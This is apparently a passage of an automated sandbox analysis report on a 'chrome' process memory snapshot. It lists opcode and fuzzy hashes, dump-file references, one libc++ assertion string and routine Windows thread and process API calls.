                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: "
                                                    • API String ID: 0-123907689
                                                    • Opcode ID: def300ad888e03b9c1c00f14dfde525097cc811a1cef64a54d602cc32a4f79d6
                                                    • Instruction ID: bf2c2c4c7cf33bb470f0bba31343e61ae1116045b851e3d558b9a85958bd1a1b
                                                    • Opcode Fuzzy Hash: def300ad888e03b9c1c00f14dfde525097cc811a1cef64a54d602cc32a4f79d6
                                                    • Instruction Fuzzy Hash: 586162B1D147858FD700CF24D88196ABBA1BFDA314F15976EF8C56B212EBB0D980C792
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D3C78F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 0-2888085009
                                                    • Opcode ID: d9227e84208f71314bb80fde6c8d1f8490f3fbe4a0c17f01aea375fc7877e5ea
                                                    • Instruction ID: fa527cdbf854b43f2c0ce74785f4c6ba72108acbc8e9e5ca20983da102c218ad
                                                    • Opcode Fuzzy Hash: d9227e84208f71314bb80fde6c8d1f8490f3fbe4a0c17f01aea375fc7877e5ea
                                                    • Instruction Fuzzy Hash: F93131B52106A28EE7289F25EC2B7327793DB85311F2D813AD6178B7E2DB789104CB10
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4d6c9128871f1856d39bcc1edb13b036d26e4810c246a284f6b4713b95345826
                                                    • Instruction ID: 8b52a99c3c82da33b0224cd5da6ef575cc527953c27e665106d246d84919b78b
                                                    • Opcode Fuzzy Hash: 4d6c9128871f1856d39bcc1edb13b036d26e4810c246a284f6b4713b95345826
                                                    • Instruction Fuzzy Hash: 242273735417044BE318CE2ECC815C2B3E3AFD822475F857EC926CB796EEB9A6174548
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a5bfe616bfbc4910b719157b54d06664c556314a9e0a999e2ae46a4eabe35072
                                                    • Instruction ID: 0e13ab01de272247ebb8771f9909b5fcf9dfe60fc34dca2f60a12bd63e132825
                                                    • Opcode Fuzzy Hash: a5bfe616bfbc4910b719157b54d06664c556314a9e0a999e2ae46a4eabe35072
                                                    • Instruction Fuzzy Hash: F8C12330A0866A8FDB24CF68ED84ABAB7B1FF10308F146619D652BB751C371ED06CB10
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05e6b3220bccc724a6c8f4dd9c5fbf611fff832a40c3537b7d16194dda6b1720
                                                    • Instruction ID: 13234a4a6063a09b4f49370cfe1433cd14a622d7b5cfe0a8da801b52a243e9af
                                                    • Opcode Fuzzy Hash: 05e6b3220bccc724a6c8f4dd9c5fbf611fff832a40c3537b7d16194dda6b1720
                                                    • Instruction Fuzzy Hash: 4FB1F23190862ACBCB24DE68ED556BEBBF1AF01308F18661DD652F76A1C730ED01CB41
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1c10c948e2f09096195d9baeeae570942aa493597e6642a0c3e209b0d645ef6b
                                                    • Instruction ID: aa22f30218628983785910d689e6d98222bae31c3587372db7bdf7e3b39ad2f9
                                                    • Opcode Fuzzy Hash: 1c10c948e2f09096195d9baeeae570942aa493597e6642a0c3e209b0d645ef6b
                                                    • Instruction Fuzzy Hash: A1917D75E002298BDF04CFA9C8807EEFBF2BB89714F25811AC855B7341CB756D469BA4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ac10dae03c3f1761c1928d843817e4831fdde63c8e01056afbe86bc9c17678e
                                                    • Instruction ID: a4469d168ab0c64019f80229475721bd3687c3f82ab67238f7eda389f1bc1ba0
                                                    • Opcode Fuzzy Hash: 6ac10dae03c3f1761c1928d843817e4831fdde63c8e01056afbe86bc9c17678e
                                                    • Instruction Fuzzy Hash: 4E719272E002258BCB14CF6DC9412AEF7F6AFC4314F2A813AD954F73A1D6759C028BA0
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fc362c2ffb57c6b1fdc15d8519223da781dcc89034d229f653650a77ea351441
                                                    • Instruction ID: 236d068060bdd85dd83eb239883ab49c0608dc09fc96d406fd1d9dae6409b67f
                                                    • Opcode Fuzzy Hash: fc362c2ffb57c6b1fdc15d8519223da781dcc89034d229f653650a77ea351441
                                                    • Instruction Fuzzy Hash: BF519FB0A005159BCB159F19D890A7EB7A5FF81314F1C892DE84AAB3C6DB31EC16C7A1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e39ebab49ac8d6ec80898289b3fb636c046095ef96c6846cb62d20459f184f5
                                                    • Instruction ID: d61661ddfdfa15836e6046b86a49fe47d1dbdbfaa99dcd47c5a6dbb5dc36ff41
                                                    • Opcode Fuzzy Hash: 3e39ebab49ac8d6ec80898289b3fb636c046095ef96c6846cb62d20459f184f5
                                                    • Instruction Fuzzy Hash: 096194F1D10B858FDB00CF24D981AA6BBB0BFDA304F15939AE8856B253E774D584C751
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d4287ac248362c97136562f94b2e2923ae13c14b45c50e788ef65c568e1df5d
                                                    • Instruction ID: 5b6c268a2655d4f9f18eeed6576f7e65ec87c5c05cd9e4aa5054c118517aca05
                                                    • Opcode Fuzzy Hash: 1d4287ac248362c97136562f94b2e2923ae13c14b45c50e788ef65c568e1df5d
                                                    • Instruction Fuzzy Hash: FC41D4B4F001054BDB149B29A85563A73A6E7C1322F54852EEC86AB34DEB71EC19C7F3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 42a44b12e609a6ab67a79d8789513c8e6b0dd2b51445cecfd6f997748aea7aaf
                                                    • Instruction ID: 49af893a100cb855ec8c5137764b17d37ad7b55447b8f883e54768b18fe1d813
                                                    • Opcode Fuzzy Hash: 42a44b12e609a6ab67a79d8789513c8e6b0dd2b51445cecfd6f997748aea7aaf
                                                    • Instruction Fuzzy Hash: B131C675F002054BD7248F39A855B26B396EBC0304F584A3CD55E9738AEB71F815C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72dbc4a276d1246ff7ff63283253b8c771180fcbf53761fc09f072742dd1c2ab
                                                    • Instruction ID: 098db8e2dab0be4f373f8e347a3e1ad032eac58cce87a7d884817bfa03050f37
                                                    • Opcode Fuzzy Hash: 72dbc4a276d1246ff7ff63283253b8c771180fcbf53761fc09f072742dd1c2ab
                                                    • Instruction Fuzzy Hash: C0314875F002548FDB108F19E814A3977A2EBC4310B494628F84AAF366E770EC11C7F1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b55b85746e3b150390d6180385d967b468e4f5c5553033ba5320840a84e087e
                                                    • Instruction ID: 217b84cf20693a798b0b7523eab7595f6b7962674134c39632d87d9fea910107
                                                    • Opcode Fuzzy Hash: 3b55b85746e3b150390d6180385d967b468e4f5c5553033ba5320840a84e087e
                                                    • Instruction Fuzzy Hash: 4B4194DAC19F8D0AD603173DA4831A3B720EEB35A8721EB47FCF4756A2F711A1956214
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37b14d815e7bbedfe433da2e42fc6cc3e7408750979de1828b2bb736ca225cfe
                                                    • Instruction ID: bf317c9ca794a6ef214177f393d3d3aa31c1929186a7ce01bf40dcaac0b6b3c4
                                                    • Opcode Fuzzy Hash: 37b14d815e7bbedfe433da2e42fc6cc3e7408750979de1828b2bb736ca225cfe
                                                    • Instruction Fuzzy Hash: 0631B261A14F848BD320CF3D9811376BBE1AFA6304F198B1DD0DB9B256EB70B494C762
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9bd2b7d09e4ca0bc2e3859500c5e8bd939ccfef3581f09e0253150e471ccf535
                                                    • Instruction ID: ff92cbd943ce05490d31101d99c993514fff05717f0c0b60605fe7ec77e24804
                                                    • Opcode Fuzzy Hash: 9bd2b7d09e4ca0bc2e3859500c5e8bd939ccfef3581f09e0253150e471ccf535
                                                    • Instruction Fuzzy Hash: CE31B674F002054BCB149F2DE85593EB7E5EBC5310F44856DE8469B39AEA30E815C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction ID: 0b4fdd809413c0d3a75860e7c6ebdfdca8f688c8dda1e3b7ff63184c7a8abd43
                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                    • Instruction Fuzzy Hash: 75115B772030B183D608863DFFB46B7A795EBC532872C637AD0416BB98CD22A962D600
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5df68c0d7bcbed49f05cd44b66c136474bb6682d7516cd60fab905d9cd43d954
                                                    • Instruction ID: 2ae507697e8726b125a410bafc9695bcd3d64976b5c8e3d3891927dd8787ccaa
                                                    • Opcode Fuzzy Hash: 5df68c0d7bcbed49f05cd44b66c136474bb6682d7516cd60fab905d9cd43d954
                                                    • Instruction Fuzzy Hash: D91103EEC2AF8C49D603573E9483591B350AEB75E4720E747FCB076262F721A5986314
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 00D52DAC
                                                    • GetCurrentThread.KERNEL32 ref: 00D52DB0
                                                    • GetCurrentProcess.KERNEL32 ref: 00D52DB8
                                                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000002), ref: 00D52DC7
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D52DF7
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EFEDD0), ref: 00D52E04
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EFEDD0,?,?,?), ref: 00D52E2F
                                                    • GetLastError.KERNEL32 ref: 00D52E4B
                                                    • SetLastError.KERNEL32(00000000), ref: 00D52E62
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D52E77
                                                      • Part of subcall function 00D3C1E0: GetCurrentThread.KERNEL32 ref: 00D3C1F5
                                                      • Part of subcall function 00D3C1E0: SetThreadPriority.KERNEL32(00000000,00010000), ref: 00D3C207
